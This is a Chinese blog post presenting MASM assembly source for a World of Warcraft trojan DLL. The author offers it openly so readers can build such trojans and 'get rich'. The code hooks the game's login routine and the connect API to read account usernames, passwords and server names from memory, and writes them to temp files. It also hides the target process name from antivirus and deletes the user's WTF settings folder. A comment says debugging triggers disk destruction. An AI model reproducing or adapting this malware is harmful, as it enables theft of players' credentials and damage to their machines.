注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

欧服WOW木马核心源代码,游戏版本v2.4.3.8606  

2012-03-19 17:02:42|  分类: Win32汇编写病毒 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧

Quote:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;                Programmed by asm, MSN:asm32@live.cn                          ;
;                  WOWGameMaker For WOW_MF_OF                                  ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;0041DAEA  |.  5E            pop    esi                <-------------特征码位置+12=断点位置
;0041DAEB  |.  33CD          xor    ecx, ebp
;0041DAED  |.  5B            pop    ebx
;0041DAEE  |.  E8 E7CAFEFF  call    0040A5DA
;0041DAF3  |.  8BE5          mov    esp, ebp
;0041DAF5  |.  5D            pop    ebp                <-------------断点位置
;0041DAF6  /.  C2 0400      retn    4                  <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要
;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可

;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h

;005B55B4      8B4D FC      mov    ecx, dword ptr [ebp-4]    <-----------------得到要跳转的地址
;005B55B7      5F            pop    edi
;005B55B8      5E            pop    esi
;005B55B9  |.  33CD          xor    ecx, ebp
;005B55BB  |.  5B            pop    ebx
;005B55BC  |.  E8 1950E5FF  call    0040A5DA
;005B55C1      8BE5          mov    esp, ebp

;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
;----------------------------------------------------------------------------------------------------------------
.486
.model flat,stdcall
option casemap:none
include debug.inc
include        windows.inc
include        user32.inc
includelib        user32.lib
include        kernel32.inc
includelib        kernel32.lib
include        advapi32.inc
includelib        advapi32.lib
include        comctl32.inc
includelib        comctl32.lib
include        psapi.inc
includelib        psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include    Shlwapi.inc
includelib  Shlwapi.lib
include    shell32.inc
includelib  shell32.lib
include macros.inc
includelib mylib.lib
include        wininet.inc
includelib    wininet.lib
HOOKAPI struct
a  byte 0B8h
PMyapi DWORD 0
d BYTE 0FFh
e BYTE 0E0h
HOOKAPI ends

MODULEINFO struct

lpBaseOfDll dword 0
SizeOfImage dword 0
EntryPoint dword 0

MODULEINFO ends
F_STOP                equ        0002h

;子程序声明

HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto  :DWORD  ,:DWORD,:DWORD
MyConnect  proto  :DWORD  ,:DWORD,:DWORD;,:DWORD
MyRecv proto  :DWORD  ,:DWORD,:DWORD,:DWORD
GetApi proto  :DWORD,:DWORD
BakDll proto  :DWORD,:DWORD

AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD

;已初始化数据
.data
hInstance dd 0
WProcess dd 0

Papi1 DWORD ?
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)
ApiBak2 db 10 dup(?)
DllName1  db "ws2_32.dll",0
ApiName1  db "connect",0
ApiName2  db "recv",0
ApiName3 db "hook",0
szWowprocess db "g&mpm",0  ;wow.exe加密
Dllbase1 DWORD ?
NowDllbase1 DWORD ?
NowDllbase2 DWORD ?
dwTemp dd ?
hAdress dd ?
;Dllbase2 DWORD ?
;NowDllbase2 DWORD ?
hRecvBak dd ?
hRecv dd ?
szJmp db  0C2h,04h,00h,0cch,0cch,0cch,0cch  ;恢复
szJmpRecv db  8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h
szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0
szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
szEbpEnter db 6Ah, 40h, 5Ah,01h,5Ch,0FAh, 12h,00h,0C7h, 16h,42h
.data?

hHook dd ?
hHook1 dd ?
hPid dd ?
;hHwnd dd ?
WOWuser db 50 dup(?)
WOWpwd db 50 dup(?)
WOWpwd1 db 50 dup(?)
WOWpwd2 db 50 dup(?)
szText db 256 dup(?)
szText1 db 256 dup(?)
@szValue db 256 dup(?)
szServer db 256 dup(?)
szUserJiaoSe db 256 dup(?)
;程序代码段
hQQ dd ?
hWnd dd ?
QQpid dd ?

hecx dd ?
hedx dd ?
hesp dd ?
hebp dd ?
hesi dd ?
hebx dd ?
hedi dd ?
szWoWBak db 256 dup(?)
szWoWBak1 db 256 dup(?)
ThreadId6 DWORD ?
szLevel db 20 dup(?)
szFileName db 200 dup(?)
szSendData db 256 dup(?)
TempPath db 256 dup(?)
hWnd1 dd ?
hEnter dd ?
hExeModule dd ?
dwModuleSize dd ?
hUserPassRealCode dd ?
hICout dd ?
hJmpEip dd ?
WOWServer  db 256 dup(?)
szFu db 125 dup(?)
stStartUp        STARTUPINFO                <>
stProcInfo        PROCESS_INFORMATION        <>
@dwSize dd ?
szFind WIN32_FIND_DATA<?>
szSend1 db 256 dup(?)
szSend2 db 256 dup(?)
hRecv1 DD ?
hAddress dd ?
szPlayerName db 260 dup (?)
szPlayerName1 db 260 dup (?)
hRecv2 dd ?
hRecv3 dd ?
hSend dd ?
szBakSend db 20 dup(?)
dwFolderCount dd ?
dwOption dd ?
.code
include inNTSAPISHELL.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;每次启动都要把目录先跟文件先清空。这样可以保证获取的等级是对应游戏账号得。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_FindFileToDel        proc        _lpszPath
local        @stFindFile:WIN32_FIND_DATA
local        @hFindFile
local        @szPath[MAX_PATH]:byte                ;用来存放“路径/”
local        @szSearch[MAX_PATH]:byte        ;用来存放“路径/*.*”
local        @szFindFile[MAX_PATH]:byte        ;用来存放“路径/找到的文件”

pushad
invoke        lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; 在路径后面加上/*.*
;********************************************************************
@@:
invoke        lstrlen,addr @szPath
lea        esi,@szPath
add        esi,eax
xor        eax,eax
mov        al,'/'
.if        byte ptr [esi-1] != al
mov        word ptr [esi],ax
.endif
invoke        lstrcpy,addr @szSearch,addr @szPath
invoke        lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; 寻找文件
;********************************************************************
invoke        FindFirstFile,addr @szSearch,addr @stFindFile
.if        eax !=        INVALID_HANDLE_VALUE
mov        @hFindFile,eax
.repeat
invoke        lstrcpy,addr @szFindFile,addr @szPath
invoke        lstrcat,addr @szFindFile,addr @stFindFile.cFileName
.if        @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
.if        @stFindFile.cFileName != '.'
inc        dwFolderCount
invoke        _FindFileToDel,addr @szFindFile ;继续找,从最后一个目录删除才可以。顺序不能调换
invoke RemoveDirectory,addr @szFindFile
.endif
.else
invoke        DeleteFile,addr @szFindFile ;是文件就删除
.endif
invoke        FindNextFile,@hFindFile,addr @stFindFile
.until        (eax ==        FALSE) || (dwOption & F_STOP)
invoke        FindClose,@hFindFile
.endif
popad
ret

_FindFileToDel        endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;权限提升
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
LOCAL      hToken
LOCAL      tkp : TOKEN_PRIVILEGES

invoke    GetCurrentProcess
mov      edx, eax
invoke    OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
invoke    LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
mov      tkp.PrivilegeCount, 1
xor      eax, eax

.if    bFlags
mov    eax, SE_PRIVILEGE_ENABLED
.endif

mov      tkp.Privileges.Attributes, eax
invoke    AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
push      eax
invoke    CloseHandle, hToken
pop      eax

ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WriteFile proc _lpbuff:DWORD,lpfilepath:DWORD
local @dwWritebyte1:DWORD
local @hFiledaka,@dwWritedaka
pushad
invoke        CreateFile,lpfilepath,GENERIC_WRITE or GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,/
0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov        @hFiledaka,eax
invoke        SetFilePointer,@hFiledaka,0,NULL,FILE_END
invoke        lstrlen,_lpbuff
mov        @dwWritedaka,eax
invoke  WriteFile,@hFiledaka,_lpbuff,@dwWritedaka,addr @dwWritebyte1,NULL
invoke        CloseHandle,@hFiledaka
popad
ret
_WriteFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;DLL入口点
DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD

.if reason==DLL_PROCESS_ATTACH    ;当DLL加载时产生此事件
push hInst
pop hInstance
invoke RtlZeroMemory,addr szText,256
invoke GetModuleFileName,NULL,addr szText,256
invoke ExtractFileName,addr szText
invoke wsprintf,addr szFileName,CTXT("%s"),eax
invoke EncryptString,addr szWowprocess ;解密wow.exe过麦咖啡
invoke CompareString,LOCALE_USER_DEFAULT, NORM_IGNORECASE,addr szFileName, -1,addr szWowprocess, -1;如果是wow,则hook
.if eax == 2
invoke OutputDebugString,CTXT("found....")
invoke LoadModuleEx,NULL
mov hExeModule,eax
invoke GetModuleImageSize,hExeModule
mov dwModuleSize,eax
invoke BytePos,hExeModule, dwModuleSize,addr szUserPassRealCode,sizeof szUserPassRealCode,hICout ;搜索特征码的位置
.if eax == -1
invoke OutputDebugString,CTXT("search error")
.endif
mov hUserPassRealCode,eax
mov eax,hExeModule
add hUserPassRealCode,eax ;特征码的位置
add hUserPassRealCode,12  ;得到实际断点位置
invoke BytePos,hExeModule, dwModuleSize,addr szJmpEip,sizeof szJmpEip,hICout ;要跳转的位置。
.if eax == -1
invoke OutputDebugString,CTXT("jmp eip code search error")
.endif
mov hJmpEip,eax
mov eax,hExeModule
add hJmpEip,eax
invoke  GetCurrentProcess                                  ;取进程伪句柄
mov WProcess ,eax
invoke BakDll,addr DllName1,addr Dllbase1        ;备份"kernel32.dll"
mov NowDllbase1,eax
invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1  ;HOOK 0041DAEE 这个地址得到用户跟密码
invoke HookApi,addr DllName1,addr ApiName1,addr Papi2,addr MyConnect,addr ApiBak2,addr WritBak2  ;HOOK connect
;invoke HookApiRecv,addr DllName1,addr ApiName2,addr Papi3,addr MyRecv,addr ApiBak2,addr WritBak2  ;HOOK recv
invoke GetApi,addr DllName1,CTXT("send") ;得到send函数地址
mov hSend,eax
invoke ReadProcessMemory,WProcess,hSend,addr szBakSend,20,NULL  ;备份send函数20字节
call kernel32_IsDebuggerPresent ;反调式。如果发现dll被调式,则摧毁硬盘。
invoke CreateThread,NULL,0,addr _Anti,NULL,0,addr ThreadId
invoke CreateThread,NULL,0,addr _GetWowGameLevel,NULL,0,addr ThreadId1
.endif
.endif
.if  reason==DLL_PROCESS_DETACH ;当卸载的时候
.endif
mov  eax,TRUE
ret
DllEntry Endp

;****************************************************************
GetMsgProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
invoke CallNextHookEx,hHook,nCode,wParam,lParam
mov eax,TRUE

ret
GetMsgProc endp
;---------------------------------------------------------------------
InstallHook proc dwProcessId:dword
push dwProcessId
pop hPid
;invoke SetWindowsHookEx,WH_GETMESSAGE,addr GetMsgProc,hInstance,NULL
mov hHook,eax
ret
InstallHook endp

UninstallHook proc

invoke UnhookWindowsHookEx,hHook
push eax

invoke WriteApi,WProcess,Papi1, addr ApiBak1 ,8              ;还原API

pop eax
ret
UninstallHook endp
;*****************************************************************
GetApi proc DllNameAddress:DWORD,ApiNameAddress:DWORD

invoke  GetModuleHandle,DllNameAddress    ;取DLL模块句柄

.if eax==NULL

invoke LoadLibrary ,DllNameAddress    ;加载DLL
.endif

invoke GetProcAddress,eax,ApiNameAddress  ;取API地址
mov hAdress,eax
mov eax,hAdress
ret
GetApi endp

;*********************************下面是核心部分*****************
HookApiRecv proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword

LOCAL ApiDz

invoke GetApi,DllName,ApiName                  ;取API地址

.if eax==0

ret

.endif
mov hAdress,eax
invoke lstrcmp,ApiName,CTXT("recv");如果是recv,则hook的地址是 recv的地址。
.if eax == NULL ;connect ?
push hAdress
pop ApiDz              ;下面几行是保存API地址
invoke wsprintf,addr szText,CTXT("Recv address:0x%x"),ApiDz
invoke OutputDebugString,addr szText
.endif
mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]

invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节

.if eax==0

ret

.endif

mov eax,WritBak

assume eax:ptr HOOKAPI

push MyApi

pop  [eax].PMyapi                ;要替代API的函数地址

.if [eax].PMyapi == 0

mov eax,0

ret

.endif

invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API

ret

HookApiRecv endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookApi proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword

LOCAL ApiDz

invoke GetApi,DllName,ApiName                  ;取API地址

.if eax==0

ret

.endif
mov hAdress,eax
invoke lstrcmp,ApiName,CTXT("connect")
.if eax == NULL ;connect ?
push hAdress
pop ApiDz              ;下面几行是保存API地址
invoke wsprintf,addr szText,CTXT("connect address:0x%x"),ApiDz
invoke OutputDebugString,addr szText
.endif

mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]

invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节

.if eax==0

ret

.endif

mov eax,WritBak

assume eax:ptr HOOKAPI

push MyApi

pop  [eax].PMyapi                ;要替代API的函数地址

.if [eax].PMyapi == 0

mov eax,0

ret

.endif

invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API

ret

HookApi endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookApi1 proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword

LOCAL ApiDz

invoke lstrcmp,ApiName,CTXT("hook")
.if eax == NULL
mov eax,hUserPassRealCode
mov ApiDz,eax
.endif
invoke wsprintf,addr szText,CTXT("myhook address:0x%x"),ApiDz
invoke OutputDebugString,addr szText

mov eax,Papi
assume eax:ptr
push ApiDz
pop [eax]
invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节
.if eax==0
ret
.endif
mov eax,WritBak
assume eax:ptr HOOKAPI
push MyApi
pop  [eax].PMyapi                ;要替代API的函数地址
.if [eax].PMyapi == 0
mov eax,0
ret
.endif

invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API
ret
HookApi1 endp
;------------------------------------------------------------------
;WriteApi修改内存
;------------------------------------------------------------------
WriteApi proc Process:DWORD ,Papi:DWORD,Ptype:DWORD,Psize:DWORD

LOCAL mbi:MEMORY_BASIC_INFORMATION
LOCAL msize:DWORD

;返回页面虚拟信息
invoke VirtualQueryEx,Process, Papi,addr mbi,SIZEOF MEMORY_BASIC_INFORMATION
;修改为可读写模式
invoke VirtualProtectEx,Process, mbi.BaseAddress,8h,PAGE_EXECUTE_READWRITE,addr mbi.Protect
;开始写内存
invoke  WriteProcessMemory,Process, Papi, Ptype,Psize ,NULL
PUSH eax
;改回只读模式
invoke VirtualProtectEx,Process,mbi.BaseAddress,8h,PAGE_EXECUTE_READ,addr mbi.Protect
pop eax
ret

WriteApi endp
;------------------------------------------------------------------
;hook掉Connect函数
;------------------------------------------------------------------
MyRecv proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD, Flg:DWORD
LOCAL  NowApiBase
mov eax,Papi3 ;hook新函数,这里要声明
sub eax,Dllbase1
add eax,NowDllbase1
mov NowApiBase,eax

push Flg
push dwProcessId
push bInheritHandle
push dwDesiredAccess
call NowApiBase
ret
MyRecv endp
;*******************************************************************
MyConnect proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD;, Flg:DWORD
LOCAL  NowApiBase
mov eax,Papi2
sub eax,Dllbase1
add eax,NowDllbase1
mov NowApiBase,eax

INVOKE RtlZeroMemory,ADDR szText1,SIZEOF szText1
INVOKE wsprintf,addr szText1,CTXT("connect inCunt:%d"),hRecv
invoke OutputDebugString,addr szText1
.if hRecv1 == 1  ;断connect函数是为了防止第一次输入错误密码再次输入的时候截不到的问题。再次调用connect的时候,就说明再次输入密码,因此要再次hook。也就是错误密码不被写入
invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1  ;HOOK 0041DAEE 这个地址得到用户跟密码
mov hRecv1,0
.endif
push dwProcessId
push bInheritHandle
push dwDesiredAccess
call NowApiBase
ret
MyConnect endp
;------------------------------------------------------------------
;获取密码函数
;------------------------------------------------------------------
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;                Programmed by asm, MSN:asm32@live.cn                                ;
;                  WOWGameMaker For WOW_MF_OF                                  ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
MyHookFunToGetUserAndPass proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD
local NowApiBase
local @dwSize1
LOCAL finddata:WIN32_FIND_DATA
LOCAL finddata1:WIN32_FIND_DATA
local hFindFile,hFindFile1

invoke RtlZeroMemory,addr WOWpwd,sizeof WOWpwd
invoke    ReadProcessMemory,WProcess,ebx,addr WOWpwd,sizeof WOWpwd,NULL
invoke RtlZeroMemory,addr WOWuser,sizeof WOWuser
invoke    ReadProcessMemory,WProcess,edi,addr WOWuser,sizeof WOWuser,NULL
invoke    ReadProcessMemory,WProcess,0088F9C8h,addr WOWServer,sizeof WOWServer,NULL
invoke RtlZeroMemory,addr TempPath,256
invoke GetTempPath,256,addr TempPath
invoke lstrcat,addr TempPath,CTXT("fmt.log")
invoke DeleteFile,addr TempPath
invoke RtlZeroMemory,addr szSendData,256
invoke wsprintf,addr szSendData,addr szWOWFmt,addr WOWuser,addr WOWpwd,addr WOWServer
invoke _WriteFile,addr szSendData,addr TempPath
invoke RtlZeroMemory,addr TempPath,256
invoke GetTempPath,256,addr TempPath
invoke lstrcat,addr TempPath,CTXT("fmttemp.log")
invoke DeleteFile,addr TempPath
invoke _WriteFile,addr WOWuser,addr TempPath
mov        @dwSize,sizeof @szValue
invoke        _RegQueryValue,CTXT("SOFTWARE/Blizzard Entertainment/World of Warcraft"),CTXT("InstallPath"),addr @szValue,addr @dwSize,CTXT("REG_SZ") ;得到WOW安装路径
invoke lstrcat,addr @szValue,CTXT("WTF/Account/")
invoke lstrcat,addr @szValue,addr WOWuser
invoke _FindFileToDel,addr @szValue ;清空当前用户下的所有文件跟子目录
invoke        WriteProcessMemory,WProcess,hUserPassRealCode,addr szJmp,7,addr dwTemp
MOV hRecv1,1
invoke WriteProcessMemory,WProcess,hSend,addr szBakSend,20,NULL  ;恢复send函数20字节
add ebp,5ch
mov eax,hJmpEip
jmp eax
ret
MyHookFunToGetUserAndPass endp

;------------------------------------------------------------------
;备份dll函数
;------------------------------------------------------------------
BakDll proc  DllName:DWORD,Dllbase:DWORD
LOCAL ModuleHwnd,hMainHeap,lpBuffer
LOCAL ModuleInformation: MODULEINFO

invoke GetModuleHandle,DllName
mov ModuleHwnd,eax
.if  ModuleHwnd==0
ret
.endif
invoke GetModuleInformation,WProcess,ModuleHwnd,addr ModuleInformation,size MODULEINFO
.if  eax ==0
jmp  UninstallHook
ret
.endif
;原DLL的基地址
mov eax,Dllbase
assume eax:ptr
push ModuleInformation.lpBaseOfDll
pop [eax]
invoke VirtualAlloc, 0,ModuleInformation.SizeOfImage,4096,PAGE_EXECUTE_READWRITE
mov lpBuffer,eax
.if lpBuffer==0
jmp  UninstallHook
ret
.endif
;备份DLL
invoke  WriteProcessMemory,WProcess,lpBuffer, ModuleInformation.lpBaseOfDll,ModuleInformation.SizeOfImage,0
.if eax==0
jmp  UninstallHook
ret
.endif
mov eax,lpBuffer
ret
BakDll endp
;*******************************************************************
End DllEntry
  评论这张
 
阅读(84)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017